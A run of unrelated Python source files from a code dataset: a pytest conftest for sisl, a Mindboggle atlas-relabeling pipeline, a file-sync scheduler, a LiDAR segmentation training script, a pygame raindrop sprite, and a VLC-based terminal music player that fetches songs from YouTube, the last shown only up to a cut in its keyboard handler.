\"sgrid\",\n \"sdata\",\n \"sgeom\",\n \"version\",\n \"bz\",\n \"brillouinzone\",\n \"monkhorstpack\",\n \"bandstructure\",\n \"inv\",\n \"eig\",\n \"linalg\",\n \"density_matrix\",\n \"dynamicalmatrix\",\n \"energydensity_matrix\",\n \"siesta\",\n \"tbtrans\",\n \"vasp\",\n \"w90\",\n \"wannier90\",\n \"gulp\",\n \"fdf\",\n \"fhiaims\",\n \"aims\",\n \"orca\",\n \"collection\",\n \"category\",\n \"geom_category\",\n \"plot\",\n \"slow\",\n \"selector\",\n \"overlap\",\n \"mixing\",\n \"typing\",\n \"only\",\n \"viz\",\n \"processors\",\n \"data\",\n \"plots\",\n \"plotters\",\n ]:\n config.addinivalue_line(\n \"markers\", f\"{mark}: mark test to run only on named environment\"\n 
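        # Sketch of what this registration enables: each name in the list becomes
        # a known pytest marker, silencing PytestUnknownMarkWarning and allowing
        # test selection on the command line, e.g.
        #
        #     @pytest.mark.siesta
        #     def test_reads_siesta_output():
        #         ...
        #
        #     pytest -m siesta        # run only tests carrying that marker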
)\n","repo_name":"zerothi/sisl","sub_path":"src/sisl/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":8322,"program_lang":"python","lang":"en","doc_type":"code","stars":155,"dataset":"github-code","pt":"61"} +{"seq_id":"71812780995","text":"import os\n\n#=============================================================================\n# Setup: import libraries, set file paths, and initialize main workflow\n#=============================================================================\n#-----------------------------------------------------------------------------\n# Steps to run\n#-----------------------------------------------------------------------------\ndo_load_vtk_surfaces = False\ndo_combine_atlas_labels = 1\ndo_convert_atlas_annot = 1\ndo_convert_original_atlas_annot = 1\ncopy_to_output = 1\n#-----------------------------------------------------------------------------\n# From settings.py\n#-----------------------------------------------------------------------------\noutput_path = '/projects/Mindboggle/output' # Where to save processing output\nsubjects_path = os.environ['SUBJECTS_DIR'] # FreeSurfer subjects directory\ncopy_path = subjects_path\nbase_path = '/projects/Mindboggle/mindboggle' # Mindboggle home directory\ninfo_path = '/projects/Mindboggle/mindboggle/mindboggle/info' # info directory\ntemp_path = os.path.join(output_path, 'workspace') # Where to save temp files\nlabel_string_old = 'labels.DKT31.manual'\nlabel_string = 'labels.DKT25.manual'\nrelabel_file = os.path.join(info_path, 'labels.surface.DKT31to25.txt')\nhemis = ['lh','rh']\n#-----------------------------------------------------------------------------\n# Subjects to process\n#-----------------------------------------------------------------------------\nfrom mindboggle.utils.io_table import read_columns\natlas_list_file = os.path.join(info_path, 'atlases101.txt')\nsubjects = read_columns(atlas_list_file, 1)[0]\nsubjects = ['OASIS-TRT-20-11']\n#-----------------------------------------------------------------------------\n# Import system and nipype Python libraries\n#-----------------------------------------------------------------------------\nfrom nipype.pipeline.engine import Workflow, Node\nfrom nipype.interfaces.utility import Function as Fn\nfrom nipype.interfaces.utility import IdentityInterface\nfrom nipype.interfaces.io import DataGrabber, DataSink\n#-----------------------------------------------------------------------------\n# Import Mindboggle Python libraries\n#-----------------------------------------------------------------------------\nfrom mindboggle.utils.io_vtk import annot_to_vtk, surface_to_vtk\nfrom mindboggle.label.relabel import relabel_annot_file\n#-----------------------------------------------------------------------------\n# Initialize main workflow\n#-----------------------------------------------------------------------------\nflow = Workflow(name='Atlas_relabeling_workflow')\nflow.base_dir = temp_path\nif not os.path.isdir(temp_path): os.makedirs(temp_path)\n\n#=============================================================================\n# Inputs and outputs\n#=============================================================================\n#-----------------------------------------------------------------------------\n# Iterate inputs over subjects, hemispheres\n# (surfaces are assumed to take the form: lh.pial or lh.pial.vtk)\n#-----------------------------------------------------------------------------\ninfo = Node(name = 'Inputs',\n interface = 
IdentityInterface(fields=['subject', 'hemi']))\ninfo.iterables = ([('subject', subjects), ('hemi', hemis)])\n#-----------------------------------------------------------------------------\n# Location and structure of the surface inputs\n#-----------------------------------------------------------------------------\nsurf = Node(name = 'Surfaces',\n interface = DataGrabber(infields=['subject', 'hemi'],\n outfields=['surface_files']))\nsurf.inputs.base_directory = subjects_path\nsurf.inputs.template = os.path.join('%s', 'surf', '%s.%s')\nsurf.inputs.template_args['surface_files'] = [['subject', 'hemi', 'pial']]\nflow.connect([(info, surf, [('subject','subject'), ('hemi','hemi')])])\n#-----------------------------------------------------------------------------\n# Outputs\n#-----------------------------------------------------------------------------\ndatasink = Node(DataSink(), name = 'Results')\ndatasink.inputs.base_directory = output_path\ndatasink.inputs.container = 'results'\nif not os.path.isdir(output_path): os.makedirs(output_path)\n\n#-------------------------------------------------------------------------------\n# Convert surfaces to VTK\n#-------------------------------------------------------------------------------\nif not do_load_vtk_surfaces:\n convertsurf = Node(name = 'Surf_to_VTK',\n interface = Fn(function = freesurface_to_vtk,\n input_names = ['surface_file'],\n output_names = ['vtk_file']))\n flow.connect([(surf, convertsurf, [('surface_files','surface_file')])])\n\n#=============================================================================\n# Combine .annot labels and convert to VTK\n#=============================================================================\natlasflow = Workflow(name='Atlas_workflow')\natlasflow.base_dir = temp_path\n\n#-------------------------------------------------------------------------\n# Combine atlas .annot labels\n#-------------------------------------------------------------------------\nif do_combine_atlas_labels:\n combine_labels = Node(name='Combine_atlas_labels',\n interface = Fn(function = relabel_annot_file,\n input_names = ['hemi',\n 'subject',\n 'annot_name',\n 'new_annot_name',\n 'relabel_file'],\n output_names = ['new_annot_name']))\n atlasflow.add_nodes([combine_labels])\n combine_labels.inputs.annot_name = label_string_old\n combine_labels.inputs.new_annot_name = label_string\n combine_labels.inputs.relabel_file = relabel_file\n flow.connect([(info, atlasflow, [('hemi','Combine_atlas_labels.hemi'),\n ('subject','Combine_atlas_labels.subject')])])\n\n#-----------------------------------------------------------------------------\n# Convert .annot labels to VTK format\n#-----------------------------------------------------------------------------\nif do_convert_atlas_annot:\n atlas_vtk = Node(name = 'Convert_atlas_labels',\n interface = Fn(function = freeannot_to_vtk,\n input_names = ['surface_file',\n 'hemi',\n 'subject',\n 'subjects_path',\n 'annot_name'],\n output_names = ['vtk_file']))\n atlasflow.add_nodes([atlas_vtk])\n flow.connect([(info, atlasflow,\n [('hemi','Convert_atlas_labels.hemi'),\n ('subject','Convert_atlas_labels.subject')])])\n atlas_vtk.inputs.subjects_path = subjects_path\n atlasflow.connect([(combine_labels, atlas_vtk,\n [('new_annot_name','annot_name')])])\n if do_load_vtk_surfaces:\n flow.connect([('surf', 'Convert_atlas_labels.atlas_vtk',\n [('surface_files','Convert_atlas_labels.surface_file')])])\n else:\n flow.connect([(convertsurf, atlasflow,\n 
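    # Note (sketch-level observation): flow.connect entries here follow nipype's
    # (source_node, dest_node, [(source_field, dest_field), ...]) pattern, so the
    # call being built forwards Surf_to_VTK's vtk_file output into
    # Convert_original_atlas_labels' surface_file input. Also worth flagging: the
    # Fn nodes in this script reference freesurface_to_vtk / freeannot_to_vtk,
    # while the imports at the top provide surface_to_vtk and annot_to_vtk from
    # mindboggle.utils.io_vtk; unless the free* names are defined elsewhere,
    # building those nodes will raise a NameError.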
[('vtk_file','Convert_atlas_labels.surface_file')])])\n# flow.connect([(atlasflow, datasink,\n# [('Convert_atlas_labels.vtk_file','atlas_labels')])])\n\n\nif do_convert_original_atlas_annot:\n orig_atlas_vtk = Node(name = 'Convert_original_atlas_labels',\n interface = Fn(function = freeannot_to_vtk,\n input_names = ['surface_file',\n 'hemi',\n 'subject',\n 'subjects_path',\n 'annot_name'],\n output_names = ['vtk_file']))\n atlasflow.add_nodes([orig_atlas_vtk])\n flow.connect([(info, atlasflow,\n [('hemi','Convert_original_atlas_labels.hemi'),\n ('subject','Convert_original_atlas_labels.subject')])])\n orig_atlas_vtk.inputs.subjects_path = subjects_path\n orig_atlas_vtk.inputs.annot_name = label_string_old\n if do_load_vtk_surfaces:\n flow.connect([('surf', 'Convert_original_atlas_labels.atlas_vtk',\n [('surface_files','Convert_original_atlas_labels.surface_file')])])\n else:\n flow.connect([(convertsurf, atlasflow,\n [('vtk_file','Convert_original_atlas_labels.surface_file')])])\n# flow.connect([(atlasflow, datasink,\n# [('Convert_original_atlas_labels.vtk_file','atlas_labels')])])\n\n##############################################################################\nif __name__== '__main__':\n flow.run()\n\n#-------------------------------------------------------------------------\n# Copy results to atlas label directories\n#-------------------------------------------------------------------------\nif copy_to_output:\n\n for s in subjects:\n for h in hemis:\n\n if do_convert_atlas_annot:\n src = os.path.join(temp_path, #output_path, datasink.inputs.container,\n 'Atlas_relabeling_workflow',\n 'Atlas_workflow',\n '_hemi_' + h + '_subject_' + s,\n 'Convert_atlas_labels',\n h + '.pial.' + label_string + '.vtk')\n tgt = os.path.join(copy_path, s, 'label', h + '.' + label_string + '.vtk')\n cmd = ' '.join(['cp', src, tgt])\n print(cmd); os.system(cmd)\n\n if do_convert_original_atlas_annot:\n src = os.path.join(temp_path, #output_path, datasink.inputs.container,\n 'Atlas_relabeling_workflow',\n 'Atlas_workflow',\n '_hemi_' + h + '_subject_' + s,\n 'Convert_original_atlas_labels',\n h + '.pial.' + label_string_old + '.vtk')\n tgt = os.path.join(copy_path, s, 'label', h + '.' + label_string_old + '.vtk')\n cmd = ' '.join(['cp', src, tgt])\n print(cmd); os.system(cmd)\n\n","repo_name":"binarybottle/mindboggle_sidelined","sub_path":"relabel_atlas_pipeline.py","file_name":"relabel_atlas_pipeline.py","file_ext":"py","file_size_in_byte":10825,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"12695470108","text":"# -*- coding: utf-8 -*-\n\nfrom ..index import IndexTree\n\n\nclass SyncScheduler(object):\n \"\"\"Browse dirty indexes and find the node that should be cleaned first.\n\n It contains the list of IndexTree to browse. 
The scheduler handles the\n    different states of the trees (some are clean, some are waiting for a task to\n    finish, ...), and returns the node (with `get_node()`) in the best order\n    possible.\n\n    When possible, the scheduler tries to group the nodes per tree.\n    \"\"\"\n\n    def __init__(self):\n        self._index_trees = []\n\n        # index of the next tree to browse in self._index_trees\n        self._index_next_tree = 0\n\n        self._generators = []\n\n    def add_index_tree(self, tree):\n        \"\"\"Add a new tree to browse.\n\n        Args:\n            tree (IndexTree): new tree to browse.\n        \"\"\"\n        self._index_trees.append(tree)\n\n    def remove_index_tree(self, tree):\n        \"\"\"Remove an index tree from the list.\n\n        If it's not in the list, do nothing.\n\n        Args:\n            tree (IndexTree): the tree to remove.\n        \"\"\"\n\n        try:\n            self._index_trees.remove(tree)\n        except ValueError:\n            return\n\n        if self._index_next_tree >= len(self._index_trees):\n            self._index_next_tree = 0\n\n        for idx, data_tree in enumerate(self._generators):\n            if data_tree['tree'] is tree:\n                data_tree['gen'].close()\n                del self._generators[idx]\n                return\n\n    def get_node(self):\n        \"\"\"Find the next node that should be synced.\n\n        Returns:\n            Tuple(Optional[IndexTree], Optional[Node]): the next node to sync\n                and the IndexTree the node belongs to. If there is none\n                available, return (None, None)\n        \"\"\"\n\n        for data_tree in self._generators[:]:\n            try:\n                node = next(data_tree['gen'])\n            except StopIteration:\n                self._generators.remove(data_tree)\n            else:\n                if node is not IndexTree.WAIT_FOR_TASK:\n                    return data_tree['tree'], node\n\n        if len(self._generators) >= len(self._index_trees):\n            # All trees have a generator\n            return None, None\n\n        # a new generator is needed\n        start_index = self._index_next_tree\n        while True:\n            tree = self._index_trees[self._index_next_tree]\n            self._index_next_tree += 1\n            self._index_next_tree %= len(self._index_trees)\n\n            if tree not in (gen.get('tree') for gen in self._generators):\n                gen = tree.browse_all_non_sync_nodes()\n\n                try:\n                    node = next(gen)\n                except StopIteration:\n                    pass  # clean tree\n                else:\n                    self._generators.append({'tree': tree, 'gen': gen})\n                    if node is not IndexTree.WAIT_FOR_TASK:\n                        return tree, node\n\n            if self._index_next_tree == start_index:\n                # We've tested all trees.\n                return None, None\n","repo_name":"Bajoo/client-pc","sub_path":"bajoo/filesync/sync_scheduler.py","file_name":"sync_scheduler.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"35319050612","text":"import os\nimport random\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport argparse\nimport time\nimport pdb\n\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data.distributed import DistributedSampler\n\nimport datasets\n\nfrom utils.metric import MultiClassMetric\nfrom models import *\n\nimport tqdm\nimport logging\nimport importlib\nfrom utils.logger import config_logger\nfrom utils import builder\n\n\nimport torch.backends.cudnn as cudnn\ncudnn.deterministic = True\ncudnn.benchmark = False\n\n\ndef reduce_tensor(inp):\n    \"\"\"\n    Reduce the loss from all processes so that\n    process with rank 0 has the averaged results.\n    \"\"\"\n    world_size = torch.distributed.get_world_size()\n    if world_size < 2:\n        return inp\n    with torch.no_grad():\n        reduced_inp = inp\n        torch.distributed.reduce(reduced_inp, dst=0)\n    return reduced_inp\n\n\ndef train_fp16(epoch, end_epoch, args, model, train_loader, optimizer, scheduler, logger, 
log_frequency):\n scaler = torch.cuda.amp.GradScaler()\n rank = torch.distributed.get_rank()\n model.train()\n for i, (pcds_xyzi, pcds_coord, pcds_sphere_coord, pcds_target, pcds_xyzi_raw, pcds_coord_raw, pcds_sphere_coord_raw, seq_id, fn) in tqdm.tqdm(enumerate(train_loader)):\n #pdb.set_trace()\n with torch.cuda.amp.autocast():\n loss_list = model(pcds_xyzi, pcds_coord, pcds_sphere_coord, pcds_target, pcds_xyzi_raw, pcds_coord_raw, pcds_sphere_coord_raw)\n loss = loss_list.sum()\n\n optimizer.zero_grad()\n scaler.scale(loss).backward()\n scaler.step(optimizer)\n scaler.update()\n scheduler.step()\n\n reduced_loss_list = reduce_tensor(loss_list)\n if (i % log_frequency == 0) and rank == 0:\n string = 'Epoch: [{}]/[{}]; Iteration: [{}]/[{}]; lr: {}'.format(epoch, end_epoch,\\\n i, len(train_loader), optimizer.state_dict()['param_groups'][0]['lr'])\n for n in range(loss_list.shape[0]):\n string = string + '; loss_stage_{0}: {1}'.format(n, reduced_loss_list[n].item() / torch.distributed.get_world_size())\n logger.info(string)\n\n\ndef train(epoch, end_epoch, args, model, train_loader, optimizer, scheduler, logger, log_frequency):\n rank = torch.distributed.get_rank()\n model.train()\n for i, (pcds_xyzi, pcds_coord, pcds_sphere_coord, pcds_target, pcds_xyzi_raw, pcds_coord_raw, pcds_sphere_coord_raw, seq_id, fn) in tqdm.tqdm(enumerate(train_loader)):\n #pdb.set_trace()\n loss_list = model(pcds_xyzi, pcds_coord, pcds_sphere_coord, pcds_target, pcds_xyzi_raw, pcds_coord_raw, pcds_sphere_coord_raw)\n loss = loss_list.sum()\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n scheduler.step()\n\n reduced_loss_list = reduce_tensor(loss_list)\n if (i % log_frequency == 0) and rank == 0:\n string = 'Epoch: [{}]/[{}]; Iteration: [{}]/[{}]; lr: {}'.format(epoch, end_epoch,\\\n i, len(train_loader), optimizer.state_dict()['param_groups'][0]['lr'])\n for n in range(loss_list.shape[0]):\n string = string + '; loss_stage_{0}: {1}'.format(n, reduced_loss_list[n].item() / torch.distributed.get_world_size())\n logger.info(string)\n\n\ndef main(args, config):\n # parsing cfg\n pGen, pDataset, pModel, pOpt = config.get_config()\n\n prefix = pGen.name\n save_path = os.path.join(\"experiments\", prefix)\n model_prefix = os.path.join(save_path, \"checkpoint\")\n\n os.system('mkdir -p {}'.format(model_prefix))\n\n # start logging\n config_logger(os.path.join(save_path, \"log.txt\"))\n logger = logging.getLogger()\n\n # reset dist\n local_rank = int(os.getenv(\"LOCAL_RANK\"))\n device = torch.device('cuda:{}'.format(local_rank))\n torch.cuda.set_device(local_rank)\n torch.distributed.init_process_group(backend='nccl', init_method='env://')\n world_size = torch.distributed.get_world_size()\n rank = torch.distributed.get_rank()\n\n # reset random seed\n seed = rank * pDataset.Train.num_workers + 50051\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n\n # define dataloader\n train_dataset = eval('datasets.{}.DataloadTrain'.format(pDataset.Train.data_src))(pDataset.Train)\n train_sampler = DistributedSampler(train_dataset)\n train_loader = DataLoader(train_dataset,\n batch_size=pGen.batch_size_per_gpu,\n shuffle=(train_sampler is None),\n num_workers=pDataset.Train.num_workers,\n sampler=train_sampler,\n pin_memory=True)\n\n print(\"rank: {}/{}; batch_size: {}\".format(rank, world_size, pGen.batch_size_per_gpu))\n\n # define model\n base_net = eval(pModel.prefix).AttNet(pModel)\n # load pretrain model\n pretrain_model = os.path.join(model_prefix, 
'{}-model.pth'.format(pModel.pretrain.pretrain_epoch))\n    if os.path.exists(pretrain_model):\n        base_net.load_state_dict(torch.load(pretrain_model, map_location='cpu'))\n        logger.info(\"Load model from {}\".format(pretrain_model))\n\n    base_net = nn.SyncBatchNorm.convert_sync_batchnorm(base_net)\n    model = torch.nn.parallel.DistributedDataParallel(base_net.to(device),\n                                                    device_ids=[local_rank],\n                                                    output_device=local_rank,\n                                                    find_unused_parameters=True)\n\n    # define optimizer\n    optimizer = builder.get_optimizer(pOpt, model)\n\n    # define scheduler\n    per_epoch_num_iters = len(train_loader)\n    scheduler = builder.get_scheduler(optimizer, pOpt, per_epoch_num_iters)\n\n    if rank == 0:\n        logger.info(model)\n        logger.info(optimizer)\n        logger.info(scheduler)\n\n    # start training\n    for epoch in range(pOpt.schedule.begin_epoch, pOpt.schedule.end_epoch):\n        train_sampler.set_epoch(epoch)\n        if pGen.fp16:\n            train_fp16(epoch, pOpt.schedule.end_epoch, args, model, train_loader, optimizer, scheduler, logger, pGen.log_frequency)\n        else:\n            train(epoch, pOpt.schedule.end_epoch, args, model, train_loader, optimizer, scheduler, logger, pGen.log_frequency)\n\n        # save model\n        if rank == 0:\n            torch.save(model.module.state_dict(), os.path.join(model_prefix, '{}-model.pth'.format(epoch)))\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(description='lidar segmentation')\n    parser.add_argument('--config', help='config file path', type=str)\n\n    args = parser.parse_args()\n    config = importlib.import_module(args.config.replace('.py', '').replace('/', '.'))\n    main(args, config)","repo_name":"GangZhang842/CPGNet","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6793,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"11965944666","text":"import pygame\nfrom pygame.sprite import Sprite\nfrom settings import Settings\n\nclass Raindrop(Sprite):\n    \"\"\"A class to represent a single raindrop.\"\"\"\n\n    def __init__(self, screen, settings):\n        super().__init__()\n        self.screen = screen\n        self.settings = settings\n\n        # Load the raindrop image and set its rect attribute.\n        self.image = pygame.image.load('D:/Users/growl/Gregor Rowley/' + \n            'Programming/Python/python_work/alien_invasion/images/raindrop.bmp')\n        self.rect = self.image.get_rect()\n\n        # Start each raindrop close to the top left of the screen.\n        self.rect.x = self.rect.width\n        self.rect.y = self.rect.height\n\n        self.y = float(self.rect.y)\n\n    def blitme(self):\n        \"\"\"Draw the raindrop to the screen.\"\"\"\n        # blit via the screen surface; the pygame module itself has no 'screen' attribute\n        self.screen.blit(self.image, self.rect)\n\n    def check_edges(self):\n        \"\"\"Return True if a raindrop drops past the bottom of the screen.\"\"\"\n        screen_rect = self.screen.get_rect()\n        if self.rect.bottom >= screen_rect.bottom:\n            return True\n\n    def update(self):\n        \"\"\"Move the raindrops down the screen.\"\"\"\n        self.y += self.settings.raindrop_speed_factor\n        self.rect.y = self.y","repo_name":"GRow1ey/python_work","sub_path":"alien_invasion/Exercises/Raindrops/raindrop.py","file_name":"raindrop.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"121019248","text":"#!/usr/local/bin/python3\n#import all necessary modules\nimport os\ntry:\n    import vlc\nexcept:\n    print('\\n[-] PLEASE INSTALL VLC MEDIA PLAYER IN ORDER TO RUN THIS PROGRAM')\nimport shutil\nfrom pynput import keyboard\nfrom colorama import init\nfrom termcolor import colored\nfrom time import sleep\nfrom random 
import shuffle\nfrom bs4 import BeautifulSoup\nfrom requests import get\nfrom threading import Thread\n\n#declare all vars\nglobal playlist\nglobal played\nglobal mp3_player\nglobal keys\nglobal s_name\nglobal per_folder\nglobal kill_thread\nglobal progress\n\n#declare all lambdas\nbase_name = lambda name : os.path.basename(name)\nparse_trailing_space = lambda x : x[:-1] if x[-1] == ' ' else x\ninit()\n\ndef get_songs(dirNames,choice):\n allFiles = []\n for dirName in dirNames: \n listOfFile = os.listdir(dirName) \n for entry in listOfFile:\n fullPath = os.path.join(dirName, entry)\n if os.path.isdir(fullPath) and choice:\n allFiles = allFiles + get_songs([fullPath],1)\n else:\n a = fullPath\n if a[-3:] == \"mp3\" or a[-3:] == \"wav\" or a[-3:] == \"ogg\" or a[-4:] == \"flac\" or a[-3:] == \"m4a\" and a[0:2] != '._':\n allFiles.append(fullPath)\n return allFiles\nkill_thread = 1\nprogress = 0\nkeys = []\ntype_music = ''\nper_folder = \"songs/my_playlist\"\nif not os.path.isdir(os.getcwd()+'/'+per_folder):#create personal playlist folder if it does'nt exist\n #os.system('mkdir songs && mkdir songs/my_playlist')\n os.mkdir(\"songs\")\n os.mkdir(per_folder)\nplayed = []\ns_name = ''\nplaylist = []\nrepeat_var = 0\ntype_music1 = lambda : type_music\n\nclass down_songs:#object to download songs\n\n def __init__(self,name,path):#init function for downloading songs\n\n self.name = name\n self.path = path\n\n def search(self):#search for the song in youtube\n\n URL = 'https://www.google.com/search?source=hp&ei=DMZHX8SiFreJ4-EP7rW_-Ao&q='+self.name+'+site%3Ayoutube.com&oq='+self.name+'+site%3Atamilrockers.ws&gs_lcp=CgZwc3ktYWIQAzoOCAAQ6gIQtAIQmgEQ5QI6AggAOgIILjoICAAQsQMQgwE6BQguEJMCOggILhCxAxCDAToLCC4QsQMQgwEQkwI6BQguELEDOgUIABCxAzoICC4QsQMQkwI6BggAEBYQHlCFGVixUGDJUmgBcAB4AIABggGIAccPkgEEMjYuMZgBAKABAaoBB2d3cy13aXqwAQY&sclient=psy-ab&ved=0ahUKEwjE2OjtzrvrAhW3xDgGHe7aD68Q4dUDCAY&uact=5'\n USER_AGENT = \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0\"\n headers = {\"user-agent\" : USER_AGENT}\n print()\n pri = colored('[-] LOCATING YOUR SONG','green',attrs=['bold'])\n print(pri)\n resp = get(URL, headers=headers)\n soup = BeautifulSoup(resp.content, \"html.parser\")\n results = []\n for g in soup.find_all('div', class_='g'):\n anchors = g.find_all('a')\n descript = g.find_all('h3')\n if anchors:\n link = anchors[0]['href']\n desc = descript[0].text\n low_name = self.name.lower().split(' ')\n if not [a for a in low_name if a in desc.lower().split(' ')]:\n continue\n item = {\n \"link\": link,\n }\n results.append(item)\n if not results:\n print()\n pri = colored('[-] COULD NOT FIND YOUR SONG. MAKE SURE YOU USE THE SAME WORDS AS IT APPEARS IN THE OFFICIAL RELEASE','red',attrs=['bold'])\n print(pri)\n return 0\n return results[0]['link'].split('?v=')[-1]\n\n def get_link(self,suffix):#get link for downloading file\n\n url = 'https://www.yt-download.org/api/button/mp3/'+suffix\n USER_AGENT = \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0\"\n headers = {\"user-agent\" : USER_AGENT}\n print()\n pri = colored('[-] PREPARING FOR DOWNLOAD','green',attrs=['bold'])\n print(pri)\n resp = get(url, headers=headers)\n soup = BeautifulSoup(resp.content, \"html.parser\")\n link = soup.find_all('a')[0]['href']\n return link\n\n def download(self,link):#download file from link\n\n print()\n pri = colored('[-] BE CALM, SMILE :) AND RELAX. 
YOUR SONG IS DOWNLOADING','green',attrs=['bold'])\n print(pri)\n r = get(link,allow_redirects=True)\n if open(self.path+self.name.lower()+'.mp3','wb').write(r.content):\n return 1\n return 0\n\nclass player:#song player object\n\n def __init__(self):#init function for song player\n\n os.environ[\"VLC_VERBOSE\"] = \"0\"\n self.instance = vlc.Instance(\"--audio-filter=visual\")#headphone\n self.instance.log_unset()\n self.player: vlc.MediaPlayer = self.instance.media_player_new()\n\n def load(self,file):#load given song\n\n self.player.set_media(self.instance.media_new(file))\n\n def play_song(self,file):#play given song\n\n self.load(file)\n self.play_pause()\n\n def set_pos(self,pos):#set position of song\n\n self.player.set_time(int(pos)*1000)\n\n def get_pos(self):#get current position of song\n\n return self.player.get_time() / 1000\n\n def forward(self,secs):#forward song\n\n self.set_pos(int(self.get_pos())+secs)\n\n def rewind(self,secs):#rewind song\n\n self.set_pos(int(self.get_pos())-secs)\n\n def play_pause(self):#pause/play song\n\n if self.has_media() and self.player.is_playing():\n self.player.pause()\n elif self.has_media() and not self.player.is_playing():\n self.player.play()\n else:\n return\n\n def play_s(self):#play song\n\n if self.has_media() and not self.player.is_playing():\n self.player.play()\n\n def pause_s(self):#pause song\n \n if self.has_media() and self.player.is_playing():\n self.player.pause()\n\n def stop(self):#stop player\n\n self.player.stop()\n\n def has_media(self):#check if player has media\n\n return self.player.get_media() is not None\n\n def get_length(self):#get total length of media\n\n return self.player.get_length() / 1000\n\n def inc_vol(self):#increase volume\n\n self.player.audio_set_volume(self.player.audio_get_volume() + 10)\n\n def dec_vol(self):#decrease volume\n\n self.player.audio_set_volume(self.player.audio_get_volume() - 10)\n\n def check_pause(self):#check if media is paused\n\n return self.player.is_playing()\n\ndef convert(seconds): \n seconds = seconds % (24 * 3600) \n hour = seconds // 3600\n seconds %= 3600\n minutes = seconds // 60\n seconds %= 60\n if not hour:\n return \"%02d:%02d\" % (minutes, seconds) \n return \"%d:%02d:%02d\" % (hour, minutes, seconds)\n\ndef printProgressBar (iteration, total, prefix = '', suffix = '', decimals = 1, length = 100, fill = '█', printEnd = \"\\r\"):\n if not total:return\n filledLength = int(length * iteration // total)\n bar = fill * filledLength + '-' * (length - filledLength)\n sec = convert(iteration)\n tot = convert(total)\n if tot == \"23:59:59\" or sec == \"23:59:59\":return\n print(f'\\r{prefix} |{bar}| {sec}/{tot}', end = printEnd)\n if iteration == total: \n print()\n\ncurrent = set()\n\ndef on_press(key):#on_press function for listener\n\n global kill_thread\n global mp3_player\n global repeat_var\n global type_music\n\n comb_ctrl = {keyboard.Key.ctrl,keyboard.Key.ctrl_l,keyboard.Key.ctrl_r}\n comb_alt = {keyboard.Key.alt,keyboard.Key.alt_l,keyboard.Key.alt_gr}\n comb_next = {keyboard.Key.right}\n comb_prev = {keyboard.Key.left}\n comb_pause = {keyboard.Key.space}\n comb_inc = {keyboard.Key.up}\n comb_dec = {keyboard.Key.down}\n comb_shuff = {keyboard.KeyCode.from_char('\\x13'),keyboard.KeyCode.from_char('ś')}\n comb_plus = {keyboard.KeyCode.from_char('='),keyboard.KeyCode.from_char('+')}\n comb_minus = {keyboard.KeyCode.from_char('\\x1f'),keyboard.KeyCode.from_char('-')}\n comb_add = {keyboard.KeyCode.from_char('\\x01'),keyboard.KeyCode.from_char('ā')}\n comb_rep = 
{keyboard.KeyCode.from_char('\\x12'),keyboard.KeyCode.from_char('r̥')}\n comb_quit = {keyboard.KeyCode.from_char('\\x11'),keyboard.KeyCode.from_char('æ')}\n comb_master = [comb_add,comb_dec,comb_inc,comb_shuff,comb_quit,comb_plus,comb_rep,comb_pause,comb_minus,comb_prev,comb_alt,comb_ctrl,comb_next]\n \n try:\n if kill_thread and mp3_player.has_media(): \n if key == keyboard.Key.media_play_pause:#listen for play/pause key \n try:\n mp3_player.play_pause()\n except Exception as e:\n pri = colored('[-] COULD NOT PAUSE/PLAY SONG ','red',attrs=['bold'])\n print('\\n')\n print(pri)\n if os.name == \"posix\":\n os.system('killall iTunes')\n if len(current) >= 2 and any(k in current for k in comb_ctrl) and any(k in current for k in comb_alt) and [b for a in comb_master for b in a if b == key]: \n if key in comb_next:#listen for next song keyscurrent.add(key)\n if type_music == \"dir\":\n try: \n play_next()\n except Exception as e:\n pri = colored('[-] COULD NOT PLAY NEXT SONG ','red',attrs=['bold'])\n print('\\n')\n print(pri)\n if key in comb_quit:#listen for quit keys\n if 1:\n kill_thread = 0\n mp3_player.stop() \n if key in comb_prev:#listen for previous song keys\n if type_music == \"dir\":\n try:\n play_prev()\n except Exception as e:\n pri = colored('[-] COULD NOT PLAY PREVIOUS SONG ','red',attrs=['bold'])\n print('\\n')\n print(pri)\n if key in comb_pause:#listen for pause/play keys\n if 1:\n try:\n mp3_player.play_pause()\n except Exception as e:\n pri = colored('[-] COULD NOT PAUSE/PLAY SONG ','red',attrs=['bold'])\n print('\\n')\n print(pri)\n if key in comb_shuff:#listen for shuffle keys\n if type_music == \"dir\":\n try:\n shuffle(playlist)\n except Exception as e:\n pri = colored('[-] COULD NOT SHUFFLE PLAYLIST ','red',attrs=['bold'])\n print('\\n')\n print(pri)\n if key in comb_inc:#listen for volume increase keys \n if 1:\n try:\n mp3_player.inc_vol()\n except Exception as e:\n pri = colored('[-] COULD NOT INCREASE VOLUME ','red',attrs=['bold'])\n print('\\n')\n print(pri)\n if key in comb_dec:#listen for volume decrease keys \n if 1:\n try:\n mp3_player.dec_vol()\n except Exception as e:\n pri = colored('[-] COULD NOT DECREASE VOLUME ','red',attrs=['bold'])\n print('\\n')\n print(pri)\n if key in comb_add:#listen for add to playlist keys\n if 1:\n try:\n add_to() \n except Exception as e:\n print(e)\n pri = colored('[-] COULD NOT ADD CURRENT SONG TO PERSONAL PLAYLIST ','red',attrs=['bold'])\n print('\\n')\n print(pri)\n if key in comb_rep:#listen for repeat keys\n if type_music == \"single\": \n try:\n repeat_var = 1\n pri = colored('[-] PLAYING CURRENT SONG ON REPEAT ','green',attrs=['bold'])\n print('\\n')\n print(pri)\n except Exception as e:\n pri = colored('[-] COULD NOT REPEAT CURRENT SONG 